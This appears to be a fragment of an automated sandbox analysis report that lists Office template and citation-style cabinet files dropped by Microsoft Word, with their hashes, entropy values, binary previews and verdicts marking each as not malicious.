                              Preview:MSCF.....;......L............................;...?...................;......................gosttitle.xsl.$...............Content.inf....v....[...=..Ic.32.E...`o.............m....4uk[.,.......{...}k{.R@(Hq..68nv...@.D.....$...j....8Q..........8.8........3...*.bi?Wt...:(..J.;&eii..io.w..z...`.'..i.MLR@.>....N..3`P.>$X@(r.#.D..(....P"_..I.$o.. L!y...I...H.........{.{....{.3....7..w..{w.2sn.dYn.lW...l...c$.UH....L6. .D$$...!F.!... .D............_..'.`.Q.v>..Z..f.n.l....0o.......bK...?s..eO....'.>t......S'..........~....h...v&7:q.x9|qs...%....:..D...ag.....e..'...".A.Y..?w"....p1t.9J.~.4.........~vj.n.8.;.O......../.}..io{p...e...\m.d`.gAm.......1"...N*...8..g"......~..[.e+.....\6i4.....%...Rq.U-p?..4P..4.f.?N.vI?.M\i.;.s..E.L.hu.*...\..5....N......]......\`...rS.\g.....2..!a).?.l.!i.^.t.u...x...g/.A..v.E...\.@.>kM...&.g.....%.......{.....2..E.g...'..[w...N.w..& 4M.a.cu.%:...\.D..Q..C.'fm..i....@._......QI.. ....h..|fB.il.(`..h.d;.l...`.s:
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:Microsoft Cabinet archive data, many, 18672 bytes, 2 files, at 0x4c "APASixthEditionOfficeOnline.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 11 datablocks, 0x1203 compression
                              Category:dropped
                              Size (bytes):34816
                              Entropy (8bit):7.840826397575377
                              Encrypted:false
                              SSDEEP:768:i3R9VYnIYfPYmqX0CnF1SRHVnLG8Pi61YbEIFO:ih9VjYfPYlk+F1SJxP71YbEIFO
                              MD5:62863124CDCDA135ECC0E722782CB888
                              SHA1:2543B8A9D3B2304BB73D2ADBEC60DB040B732055
                              SHA-256:23CCFB7206A8F77A13080998EC6EF95B59B3C3E12B72B2D2AD4E53B0B26BB8C3
                              SHA-512:2734D1119DC14B7DFB417F217867EF8CE8E73D69C332587278C0896B91247A40C289426A1A53F1796CCB42190001273D35525FCEA8BA2932A69A581972A1EF00
                              Malicious:false
                              Preview:MSCF.....H......L............................H...?...................G......................APASixthEditionOfficeOnline.xsl.H...............Content.inf..h;.....[...Q..\..3S.5..oVP!i/Z.Ls...]q$...xY..+W.qm..B..y/.5.s..x$../K./.x.$.....}.......\........LNf..Hd.&."Ip.L.Mr-@.D..kW~i...^.....F.....T.U....../..0..2.{.q.T.`'{.00.{.B...>.R..2....1.~_.f..s...........~....~[..v..w..v....$[K.r$#[6...d;[...#.9.-...G..Z..eAR.0")%JI?&....$..$.H..$(........f.> k....hP...p...!j.T......l7..../3..(2^V...#..T9...3.@[0...le:...........E....YP.\.....au1...\.S|..-.duN.Z..g.O......X8....1.....|,.f/..w.|Wk]zJz.g'./7h..+.....}............x....s.2Z\..W.{...O....W.{j.U..Q....uO=.p.M k.E.S{SUd.@....S.Syo8>......r......8..............Z?>.mUAg....?o....f.7..W.n...P..........d.S?...\..W`...c.ua..........#.Y...45...F(d.o\09^..[.}...BsT.SD..[l.8..uw.7l..S.9T.KR..o......V..]...M .....t.r...:P...M....4.F.....@..t.1t..S...k.2.|5...i.%H..<.J..*.0n.....lZ.....?.*?.~..O .)..
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:Microsoft Cabinet archive data, many, 15461 bytes, 2 files, at 0x4c "gostname.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 8 datablocks, 0x1203 compression
                              Category:dropped
                              Size (bytes):31605
                              Entropy (8bit):7.820497014278096
                              Encrypted:false
                              SSDEEP:384:7SpOUxgQ9gFodHZktfHa2TSmcAg76j8/xorK0JoZgbA8E0GftpBjE2PzFLrHRN7S:OngHltf7Bcp/xoB3A8Pi625D8RA54
                              MD5:69EDB3BF81C99FE8A94BBA03408C5AE1
                              SHA1:1AC85B369A976F35244BEEFA9C06787055C869C1
                              SHA-256:CEBE759BC4509700E3D23C6A5DF8D889132A60EBC92260A74947EAA1089E2789
                              SHA-512:BEA70229A21FBA3FD6D47A3DC5BECBA3EAA0335C08D486FAB808344BFAA2F7B24DD9A14A0F070E13A42BE45DE3FF54D32CF38B43192996D20DF4176964E81A53
                              Malicious:false
                              Preview:MSCF....e<......L...........................e<...?...................;......................gostname.xsl."...............Content.inf.[.......[...>..|..32.E..o`h....W.>.^...v..5...m.w.$.U..U......m.mu...'4....m`.9F.. ...I..PTS..O.D...GM#...#CUE.`.`%n..N...G,.~..+.6cv.L...G.m.Y..vy.....Yh9/.m,..wtw..;....Ka.a.{.\...'.....<X....%)...G..d......R./..4$..32..@....f.h....w..ov.}w..[.....{.v.......dr..&w#G..$3.zI&f..(C..L.z5J... .`...!.!4. ...!.` .$........w.J.X7.w_..@.w..f]=.C.....I-....s.s_.x...~..A... ...z...nM..;....Z....vt....6...~.w.....*x.g.h.T.J..-.3=....G.n..ti.A...s...j$.Bf..?......6.t.<j...>.."....&=BO?w.uN.o.t.-r..K....>C..^G..p...k...>.xZ.[fL..n.."].W#...|.i.0W.q.F: ..<#w......w....s....."...n.qu.../rI.....q....P~.B..|b?.N.}..MyO..q..:q.7..-~.xa.S...|.....X.....g.W.3.mo..yy.GG.s>....qy....r........#.F.P..A.......A....b.2..14.8.i6..w.S...v~{0z.<.Z...^!.;2mSV.i....{...U...+...r.;...h.++..T6.a...$....j5F+..1t....b......|.Q\d-.S..2... ......Y..A...s....
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:Microsoft Cabinet archive data, many, 27509 bytes, 2 files, at 0x4c "Equations.dotx", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 2 datablocks, 0x1203 compression
                              Category:dropped
                              Size (bytes):43653
                              Entropy (8bit):7.899157106666598
                              Encrypted:false
                              SSDEEP:768:+bjfeR1OOZvv439PlDe5/QzhgFSo0UEDmJwkqTA8Pi63Bsgn66w:IM3CN9ZzhFbUUwaP73BsB6w
                              MD5:DA3380458170E60CBEA72602FDD0D955
                              SHA1:1D059F8CFD69F193D363DA337C87136885018F0F
                              SHA-256:6F8FFB225F3B8C7ADE31A17A02F941FC534E4F7B5EE678B21CD9060282034701
                              SHA-512:17080110000C66DF2282FF4B8FD332467AF8CEFFA312C617E958FDFEBEE8EEA9E316201E8ABC8B30797BB6124A5CC7F649119A9C496316434B5AB23D2FBD5BB8
                              Malicious:false
                              Preview:MSCF....uk......L...........................uk...?...................j......r...............Equations.dotx.................Content.inf.94v..R..[..... .............v........." Vw.w..r.....D.V5.p...W......b;....\x.....f.-...............l.....L.F..*..@..BnF.I.....%1..0....&.X.......X-.\.\.>..A....@..:...N .G./.Sp.A0.0.`.....q....b... ......S.{K...V....J............>\....\.E.#.,$.hxu.F.Fo....<...{..6../..#..l>d...w...&...S.....L.].....^..L......;~l.......qw.o. .....v.u.W`.4Z.A.....dC..Q)9.c..qgtfJ..G.(.J....q4V.).mK4;..zY..b.5&....V...0X.].Z..U.Lx..^..:8XQh.....7yy.._5............c.W...c...xY..%..G.$....kg^.1g.9.....z^.'...q."..K)a[.pW .LS.:Q8.....2..._q.os....y...d11.*.m....8.,.^.4_?i.e.u.,....._y.....zZZA.D.D<..+....{....Sfnv...t.....0...vV..y.r..3..%.<.t......;.h.wh.-.g.>..5...R...........y..]^..R..<...>$~.'...kk.n..H.EN.eQ.Q.O./='....)t.l0,/].....FNN......?...&..'.eS....K.K.v".^L..x=.^......1x|....=}@...B.kq;_a..C.q?..Y9.v......Q..u.G..V.
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:Microsoft Cabinet archive data, many, 6005 bytes, 2 files, at 0x44 "HexagonRadial.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                              Category:dropped
                              Size (bytes):22149
                              Entropy (8bit):7.659898883631361
                              Encrypted:false
                              SSDEEP:384:b98FG/zdCbf7BOEawSi8E0GftpBjEPTFPxFLrHRN7S5ll7PK/pA2:N/zAbDae8Pi6PFPSRIA2
                              MD5:66C5199CF4FB18BD4F9F3F2CCB074007
                              SHA1:BA9D8765FFC938549CC19B69B3BF5E6522FB062E
                              SHA-256:4A7DC4ED098E580C8D623C51B57C0BC1D601C45F40B60F39BBA5F063377C3C1F
                              SHA-512:94C434A131CDE47CB64BCD2FB8AF442482F8ECFA63D958C832ECA935DEB10D360034EF497E2EBB720C72B4C1D7A1130A64811D362054E1D52A441B91C46034B0
                              Malicious:false
                              Preview:MSCF....u.......D...........................u....?..................................HexagonRadial.glox.................Content.inf.........[.....`........./.mT.T6...CP..z5...0.PcUmCUSUCU.Q.P.0..f............^...H..2e.[..8...ld......*F.%.j.w!R..NA.L............ .r..z....$&.........P.=.r...O...e..dfv_.i%.C....^......?..x...+d..].B.3..EU...|Cc..z.`lQp..fr.....8!;.8.p.ZwH\.........~..T.t..]..H.]..S.2..Vt.....r.H../..-8........!:.Y&..|A..J.U...-.%..k..U...4m.. .q../..b.8.vc~......_q1.?..Bh.v.....L..I.$I..s.".u.. Y....I^5.v...3.......].^)b.t.j...=...Ze~.O...|.}T.._9c........L....BV.^......X..?.....{.>.j..5.m...d.7........g[..f.nST...i..t..|.T.jjS..4p.Pxu..*..W...|.A)..|9;....H.e.^.8D..S...M..Lj.|...M.m+..H.....8.&-....=.L.....n.v..M.9...l....=r......K.F.j.(.(xD.3..r'9.K..-...5..Z..x....._....a[...J...`.b_a\\j.ed..\.3.5....S.T...ms.....E...Xl.y.LH=...}..0.T...04.4..B[..H.....B{B9.h..=.8Mn.*.TL.c..y.s.?.c9$l...).h).6..;.X../_>Pl...O...U.R..v.dy$A
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:Microsoft Cabinet archive data, many, 14813 bytes, 2 files, at 0x4c "iso690nmerical.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 7 datablocks, 0x1203 compression
                              Category:dropped
                              Size (bytes):30957
                              Entropy (8bit):7.808231503692675
                              Encrypted:false
                              SSDEEP:384:rKfgT03jNkAFbgUQWtxq9OGh1bBkd/1MVHb5iVOdMgbA8E0GftpBjEl8tFLrHRNF:r303jOrUQAkfhopWHbA8Pi6l8zuUIq
                              MD5:D3C9036E4E1159E832B1B4D2E9D42BF0
                              SHA1:966E04B7A8016D7FDAFE2C611957F6E946FAB1B9
                              SHA-256:434576EB1A16C2D14D666A33EDDE76717C896D79F45DF56742AFD90ACB9F21CE
                              SHA-512:D28D7F467F072985BCFCC6449AD16D528D531EB81912D4C3D956CF8936F96D474B18E7992B16D6834E9D2782470D193A17598CAB55A7F9EB0824BC3F069216B6
                              Malicious:false
                              Preview:MSCF.....9......L............................9...?...................8......1P..............iso690nmerical.xsl.................Content.inf...A@...[...5.....33.E...P.../..........5sv.]3srm8.T.=.......}.v.T.. ..4IH.r.%Z.(.q.\+K..[,....E....A......#CEF..}p..Y/s$...YKI.#M.?.t.1#C....I..v.vn...-...v7../S.m.Ma.....!.Y....4.......3.3....c&R9..%......(J..BDMI.>7J.....".....}.w.}w.wg.v...^.n.{....{f.mlI..%.#..I..S....D..QJ U......4........K.(@....DH.....}...8;..z...&0%e..G.OAM..x.3......\....zS9....}......89.B...e.W.p{;.....m.m3...}....../...q.~..;.,..".j.g..^N............iC.../|...g.=..9.Q].Gf.....QA....74..v.....9.n[......0.}..jo{y./.2..Ym......;u...b.(Jz^.....~..uM...{s../..#.)n2..S.S.c..6)U.V....!.'R.......P.S.D..S.p/......D.......{......?.u.",...Mp._....N..+..=Y#..&0w....r.......$.xwC......P.e7.>O....7....].y%q^S'....*.C.`.?..}Q..k../u.TK...y........S...{T.?......[.H.'L..AS.Y.|*..b...J.H-.^U>'9..uD[.".b[.l.......o..6.L).h.B0RJa.b..|m:.):......F
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:Microsoft Cabinet archive data, many, 30269 bytes, 2 files, at 0x4c "Text Sidebar (Annual Report Red and Black design).docx", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 2 datablocks, 0x1203 compression
                              Category:dropped
                              Size (bytes):46413
                              Entropy (8bit):7.9071408623961394
                              Encrypted:false
                              SSDEEP:768:WaxA0CH65GY3+fvCXCttfR8JEBrkquwDn+QV5V+vNWBatX/xG8Pi65sMuMjvU+mQ:hne65GYOfKXMSEBrBtDnzFAI4JxP75sM
                              MD5:C455C4BC4BEC9E0DA67C4D1E53E46D5A
                              SHA1:7674600C387114B0F98EC925BE74E811FB25C325
                              SHA-256:40E9AF9284FF07FDB75C33A11A794F5333712BAA4A6CF82FA529FBAF5AD0FED0
                              SHA-512:08166F6CB3F140E4820F86918F59295CAD8B4A17240C206DCBA8B46088110BDF4E4ADBAB9F6380315AD4590CA7C8ECDC9AFAC6BD1935B17AFB411F325FE81720
                              Malicious:false
                              Preview:MSCF....=v......L...........................=v...?..................5u......................Text Sidebar (Annual Report Red and Black design).docx.v...............Content.inf..C,.zd..[............... .w.....b...wwww]r..W\ww...... .hh...........o.nz.....Ku.7..-.oH...h;.N..#.._.D,}......!Q$..Un.tI11..$w.r3... ..p...=.1....""..n...*/....h.A...Y..c,.Q.,......",..b.1.w..$.....l../;..J.....~.. ....+.R#....7.-..1.x.feH.@.......u...(.DQ%.wL.N|.xh...R..#....C...'X.m.....I{W.....5.C.....\....z.Y.)w..i...%....M..n.p.....{..-G9..k.bT.6........7....).....6..ys.....R.e.....0.Xk`.3..X\xL..4J"#.f...:....r..2..Y.uW..052.n.+ ..o..o..f&u.v.&9y.P..6.K..in.DU.#.~....4i..6;.5.w..i...g.(....../..0*Vh...C..//....W..:w......7.6....]....4.*9...sL.0k...zHh..2N.H...*..]..(.x.:..........Y.+...-.....&.*^..Q.sW...v..w.....k.L.e.^.W4iFS..u.....l.g'...b~:Zm...S.2.|......5S..=.............l.../|....G|.9 ..#.q...W.Q...G=.."W..'.6....I....D._.{.g.47....V.1._..<?....m............)..T.
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:Microsoft Cabinet archive data, many, 15418 bytes, 2 files, at 0x4c "harvardanglia2008officeonline.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 9 datablocks, 0x1203 compression
                              Category:dropped
                              Size (bytes):31562
                              Entropy (8bit):7.81640835713744
                              Encrypted:false
                              SSDEEP:384:yhsBScEWkrljntbzuMmWh7ezPnGgbA8E0GftpBjohgsRFLrHRN7ybll7PK/p:MsBScwtnBmWNeTzA8PiuWsvyDI
                              MD5:1D6F8E73A0662A48D332090A4C8C898F
                              SHA1:CF9AD4F157772F5EDC0FDDEEFD9B05958B67549C
                              SHA-256:8077C92C66D15D7E03FBFF3A48BD9576B80F698A36A44316EABA81EE8043B673
                              SHA-512:5C03A99ECD747FBC7A15F082DF08C0D26383DB781E1F70771D4970E354A962294CE11BE53BECAAD6746AB127C5B194A93B7E1B139C12E6E45423B3A509D771FC
                              Malicious:false
                              Preview:MSCF....:<......L...........................:<...?..................D;.......V..............harvardanglia2008officeonline.xsl.L...............Content.inf.Vu......[...E..o..3D.5..nF.A..+.e.....6r..f........M3...-.s.m.... $r.b.!.q!.....G...0.\.......fd......%m...'1Y..f..O...*.#.P.,{..m...|..ww.{.m...f...n%...,..y...0y...8.Q...`.../.q....a...',.V......8.7..8t..................6.]..6..nw..ynm..-l.Y..,.I?..$....+b9$E!S@"..) .4........H...lA...@!a.F.l$..0#!.....n&.5j.t+..1f|.+....E.zDk.l8.+<q.^.........\5.l..iT.9...........Y..6.^,.o.bn.E*5w..s.../...W.gS..j9..'W.F......].4\Mzz..Td..Ho..~.Q...Z..D..O.JP..m..s.j.:..........y._.....#.*.rD....60.\!y........p.o3,..Ub,......[[L.{.5.....5.7UDB9.{;;g.z.z..jM.G.MY.oe.....(r..B6..CV.7Fl.Z/....-.O.vY.c...-..........b.T)3.u..f~x2.?.8.g.x.-.....Qt_...$e.l..jtP..b....h..*.sW0.`.....c...F_....t.........LC..*5I.X$^.;&....#.._\J..........;..wP..wX.qy.qs...}46..fK.XN.&0........k1....8...............'t.......}.......O_.
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:Microsoft Cabinet archive data, many, 14864 bytes, 2 files, at 0x4c "mlaseventheditionofficeonline.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 8 datablocks, 0x1203 compression
                              Category:dropped
                              Size (bytes):31008
                              Entropy (8bit):7.806058951525675
                              Encrypted:false
                              SSDEEP:768:ktH7oN/HbwiV+M+4Jc+5UrT3czi5uOHQA8Pi6DxUR/WTZIy:87sPEANXJc+eTMsuzP7DmN0ZIy
                              MD5:E033CCBC7BA787A2F824CE0952E57D44
                              SHA1:EEEA573BEA217878CD9E47D7EA94E56BDAFFE22A
                              SHA-256:D250EB1F93B43EFB7654B831B4183C9CAEC2D12D4EFEE8607FEE70B9FAB20730
                              SHA-512:B807B024B32E7F975AED408B77563A6B47865EECE32E8BA993502D9874B56580ECC9D9A3FEFA057FDD36FB8D519B6E184DB0593A65CC0ACF5E4ACCBEDE0F9417
                              Malicious:false
                              Preview:MSCF.....:......L............................:...?...................9......................mlaseventheditionofficeonline.xsl.L...............Content.inf.N.#.....[...>..9..3c.5...F.B.]Y.3..%d.8...v;....~Y.L.=..v..m.g...|K.B....$......s.......#CdE.p.p..@...j.Nl2'...L..N.G:-V:.d.....i..M........mK.w.....\W.<.`..b$.!..!3..rT.A..#.).;KZ...a.-..j&e`R.~7dIRS.I..f.ff....}.}....^[wo.uw..i.m7......v$.I..n....-.Z.M5...iH..Ea..., [..0.L...DH..." ..... .@...H.@..+...}.......*^..'.4*.tHa..f].gV..~.7V.....C..).(.U"..f.@l..j'..%\.u.UU.....9<13...5..=........./..Z..{..-.L].+Y.fL.<EJ.q..!.j....W..]E./.~Y>...GgQ..-....Q.C..5..T+...fO. .)..~.7..Y....+..U=.e..8w.m...._..S..v.d.* ......S3z.X)......u...t.......i.;.a...X.Ji....g.3.!.O.....T.f6..[U....O..Z.X.q.G....?.k]..?...8.u.;].8y.T.9D..!?R....:........3+.P.....7?m}..............1...y3.g.\c.ks^;?.f.U5...U.j....E.N.}.!.......).R1....~.....R.....3.J.f...l..E^:...&_..%..v...^..E...rC..O....M.#..<..H..bB.+.W..
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:Microsoft Cabinet archive data, many, 7453 bytes, 2 files, at 0x44 "pictureorgchart.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                              Category:dropped
                              Size (bytes):23597
                              Entropy (8bit):7.692965575678876
                              Encrypted:false
                              SSDEEP:384:y6aR//q0bJi/Uj+957G8E0GftpBj/4YOFLrHRN7LxhKll7PK/ph:y6I/Li/UjmVG8PiZ4YsLxh6Ih
                              MD5:7C645EC505982FE529D0E5035B378FFC
                              SHA1:1488ED81B350938D68A47C7F0BCE8D91FB1673E2
                              SHA-256:298FD9DADF0ACEBB2AA058A09EEBFAE15E5D1C5A8982DEE6669C63FB6119A13D
                              SHA-512:9F410DA5DB24B0B72E7774B4CF4398EDF0D361B9A79FBE2736A1DDD770AFE280877F5B430E0D26147CCA0524A54EA8B41F88B771F3598C2744A7803237B314B2
                              Malicious:false
                              Preview:MSCF............D................................?..................................pictureorgchart.glox.................Content.inf.W..y....[.............../.jC....U.CUUUTU.5...jjPU..MP....T..0*....o0.......Y.=....P.({.3.p..."pA!>r../3.q..7...........!...TO....(..%......6...3E?....~......CZmndse.Qy....p....h....=.:5...F..%.E.&.v.`I~. ..%._..b]..Y..Q..R.........nN.q8c..a..L..X/.M...PP.q..SpZ.K]>D"Pf..B.c....0..|I.Q.,.g/..Kev.../..=......w..}3.....(....+#T.....K`N.u..Z.....rriK.(...(...6.<R.%.]..NX..b..].C.u....++......Ia.x. .7....J.#............w>....7..R...H>....@%....~.yA.......~.UB..*. .P..$...-...v.....=M."....hw..b....{.....2pR....].C..u@=G."Y..;..gc/N.N.YB.Z.q.#....$....j.D.*.P..!.)S.{..c....&'E.lJ%.|O.a...FG.|.....A..h.=c7.)d.5...D...L...IQ..TTE.*NL-.*M..>..p0.`......m..,.w#rZ..wR\@.Wn..@Q...}..&...E...0K.NY....M.71..`.M./:.>..._L..m...,U.l....._fi...nj9..,..w.s.kJ.m.s.M.vmw.!.....B.s.%.-').h.....)c.l....F..`3r...-.....0..7..&N.....n.#H...<7
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:Microsoft Cabinet archive data, many, 15691 bytes, 2 files, at 0x4c "gb.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 9 datablocks, 0x1203 compression
                              Category:dropped
                              Size (bytes):31835
                              Entropy (8bit):7.81952379746457
                              Encrypted:false
                              SSDEEP:768:ltJDH8NmUekomvNufaqA8Pi6x5q3KQIGu:lvINukgzP7x5mRIGu
                              MD5:92A819D434A8AAEA2C65F0CC2F33BB3A
                              SHA1:85C3F1801EFFEA1EA10A8429B0875FC30893F2C8
                              SHA-256:5D13F9907AC381D19F0A7552FD6D9FC07C9BD42C0F9CE017FFF75587E1890375
                              SHA-512:01339E04130E08573DF7DBDFE25D82ED1D248B8D127BB90D536ECF4A26F5554E793E51E1A1800F61790738CC386121E443E942544246C60E47E25756F0C810A3
                              Malicious:false
                              Preview:MSCF....K=......L...........................K=...?..................q<......................gb.xsl.................Content.inf.EF/.....[...A....3D.4..oVP!i/......t.6..l&9r0.8......c..q.^........$/..(./H ...^_Z0\4.42WU......P.F..9.._....'.D..<H@..E.b,K..9o..wo..v|..[.{7m.......|}aI..|g....IF2au?.1,..3.H.......ed....-.........m....$..8&0..w........2....s....z..d.Z.e.....@$r[..r..4...."E.Q@...Hh.B"b>...$.L.$.P.._..~.?./T..@..F..?.~G...MS..O%Z3*k..:..._...!GF..U...!..W..$..7...j......xy0..../.j..~4......8...YV....Fe.LU..J.B.k%BT5.X.q.w.a4....5..r...W.6.u...]i...t.....e.\.K............#t.c5.6....j...?#..{.m3.L9...E/....B[R.k(.'....S.'.}!j.tL..v....L....{<.m4......d_kD..D.....4`aC....rg..S..F.b..^........g;.`?,......\..T.\.H.8W.!V...1.T1.....|.Uh....T..yD'..R.......,.`h..~.....=......4..6E..x#XcVlc_S54 ..Q.4!V..P...{w..z.*..u.v....DC...W.(>4..a..h.t.F.Z...C.....&..%v...kt....n..2....+.@...EW.GE..%.:R`,}v.%.nx.P.#.f.......:.5(...]...n3{...v........Q..
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:Microsoft Cabinet archive data, many, 15327 bytes, 2 files, at 0x4c "sist02.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 8 datablocks, 0x1203 compression
                              Category:dropped
                              Size (bytes):31471
                              Entropy (8bit):7.818389271364328
                              Encrypted:false
                              SSDEEP:768:eNtFWk68dbr2QxbM971RqpzAA8Pi6TlHaGRA5yr:eNtEkpGSbuHAkP7TlHaGq54
                              MD5:91AADBEC4171CFA8292B618492F5EF34
                              SHA1:A47DEB62A21056376DD8F862E1300F1E7DC69D1D
                              SHA-256:7E1A90CDB2BA7F03ABCB4687F0931858BF57E13552E0E4E54EC69A27325011EA
                              SHA-512:1978280C699F7F739CD9F6A81F2B665643BD0BE42CE815D22528F0D57C5A646FC30AAE517D4A0A374EFB8BD3C53EB9B3D129660503A82BA065679BBBB39BD8D5
                              Malicious:false
                              Preview:MSCF.....;......L............................;...?...................;......g...............sist02.xsl.................Content.inf....!....[...=.rF..3U.5...g.i?..w.oY..If'.......Y.;.B.....Wo.{T.TA.~......8......u.p....@Q..k.?.....G....j.|*.*J69H.2.ee..23s..;3..i..L.,...0se.%J........%.....!.....qB...SC...GAu5.P..u7....:.|.$Fo............{.......v.v.g..{o....e.....m.JeRG..,.%.1..Lh.@8.i.....l.#.HB`B....C......D@....?....P?..................|.9..q.......9.n.....F...s,....3..Q..N......y......_i..9|.<w...'q.Tq...U.E.B...q.?.4..O(_O.A.......*jC.~.21.7.....u.C...]uc.....-.g.{C~9q.q.1.1...4..=.0.Z.^....'../....-.6.K.....K...A#.GR..t.@.{.O.......Q5..=....X...^...F3.e.E.Z..b+R..?Z..0T1.....gQz.&....%y=zx.f.....6-*...u.Rm..x<...?...!g@.}..).J...:*...9.s&.v..}..'...\..Sd..F...........kQr.....h..3..1....B...B{M...%O.59.\.#....s/.pE.:}...k_.P.>.zj....5|.9+....$M..L........(...@#.....N.....N.*..........E..7..R$.:9!r>7.....v...>..S.w....9..]..n.w.;&.W..<r\S....
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:Microsoft Cabinet archive data, many, 5731 bytes, 2 files, at 0x44 "ThemePictureAlternatingAccent.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                              Category:dropped
                              Size (bytes):21875
                              Entropy (8bit):7.6559132103953305
                              Encrypted:false
                              SSDEEP:384:k73HRpZA6B3ulrnxtRT7G8E0GftpBjEdHqlFLrHRN7uhFlvQyUTL2m4c:k7XRgIkrG8Pi6dmuNvU+mp
                              MD5:E532038762503FFA1371DF03FA2E222D
                              SHA1:F343B559AE21DAEF06CBCD8B2B3695DE1B1A46F0
                              SHA-256:5C70DD1551EB8B9B13EFAFEEAF70F08B307E110CAEE75AD9908A6A42BBCCB07E
                              SHA-512:E0712B481F1991256A01C3D02ED56645F61AA46EB5DE47E5D64D5ECD20052CDA0EE7D38208B5EE982971CCA59F2717B7CAE4DFCF235B779215E7613AA5DCD976
                              Malicious:false
                              Preview:MSCF....c.......D...........................c....?..................................ThemePictureAlternatingAccent.glox.................Content.inf...3.....[.... .qq...........\<.^......o."......f.o...x.{..q..^.MH^...........{0.K....4pX.i...@6A4X.P.01d....'p.......zA.......... .......7.......a. `.=!@- ......>G.s.k~@.a.lfha:m....1...@.,G`....{....W..N..qs.......j.+TrsT.l.9..L...1+...d..-u..-.......).#u&...3......k.&C...DdZ.'.......8..<PF..r.eq.X6...u..v...s5.m.Q.l.G%.<.]....RV<...S..Dv..s.r.......dh.N.3-.Hf'.....3.GZ..E.kt.5......h...|...?!.L....~.)..v....:2.../F.,....o.qi.i7..E.|.mh.R_.@A.FO@i.....Feo...x.l...{E.\W9|V...=#..3..(......tP.:i....Ox.U.N...%6...p.6&.....<zh.z.|.<Z.?.k....y7m...F.Z$-.:.l.h...{T..7....?..T...d,r...z?../...`/Z......a.v@)....u......V..v.:.._.|.'..[..O.s.OAt-."b.In"..I...J*.~H.:-...?..uV....dZ;z:.l.{.E.,.Q..i]:.0r.I.y..f...../j.wN...^R.....u....>..}....f.f...]A..C~;/....%..^#..N.a..........99.....`.....%..iS....S......$....)
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:Microsoft Cabinet archive data, many, 4313 bytes, 2 files, at 0x44 "chevronaccent.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                              Category:dropped
                              Size (bytes):20457
                              Entropy (8bit):7.612540359660869
                              Encrypted:false
                              SSDEEP:384:KyeISBuydn5rpmp77G8E0GftpBjE/kFLrHRN7ngslI66YVj:KHISBvd5rpmFG8Pi6/6nK666j
                              MD5:4EFA48EC307EAF2F9B346A073C67FCFB
                              SHA1:76A7E1234FF29A2B18C968F89082A14C9C851A43
                              SHA-256:3EE9AE1F8DAB4C498BD561D8FCC66D83E58F11B7BB4B2776DF99F4CDA4B850C2
                              SHA-512:2705644D501D85A821E96732776F61641FE82820FD6A39FFAF54A45AD126C886DC36C1398CDBDBB5FE282D9B09D27F9BFE7F26A646F926DA55DFF28E61FBD696
                              Malicious:false
                              Preview:MSCF............D................................?..................................chevronaccent.glox.................Content.inf..O.$N...[.........B.....?.....$Zy..Zkr...y<.....Di-.aVX/....h..-.~........#.../.Fz....T...p....A..eHMe[..p...=................f..../%o......F@..=..$.B!....}.0..g..^vlI......f.W.F...Nm..2`...)...,.HL4.nsl.F.ir.k..e.!^.j2.v.iT....t...*..!h..Y...2Q..-.x.,.Xj.U.cj,....9.....)..W..n3f.......(cH.D.4M.!.+..4..3r..y......|r..@.PD.R..#...F..nJAR..1{-.....u3..$..L.b+h....:lZ.>....q.?. ~l..^.%.m....a...cG.h.?.|.?7.'....b.G.4..'..A...o.Z...//..?...d..*.....C..Z.....]Yv.g.]..... .........]x.#=.../.7;R.j....G.....zq=O`[.'5g.D.u..)..../../.v.JmCW.da....3.f..C.z%...S=....;A.q.|....z.E.aRu........ k..J"+.f.S.@.........eD4....\0..t./U..%.H..........M:..U.......J...Z..H.DG..u^..D..P....`.^b.........`c......#.....c.?...#..C.V.&.'..f.'...f.[..F.O..a...&..{TiXg4; .X."..0...B.#..^..........N"..w.@f...gd.S..K.....E....ZR...;.twR>.z.
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:Microsoft Cabinet archive data, many, 16689 bytes, 2 files, at 0x4c "iso690.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 9 datablocks, 0x1203 compression
                              Category:dropped
                              Size (bytes):32833
                              Entropy (8bit):7.825460303519308
                              Encrypted:false
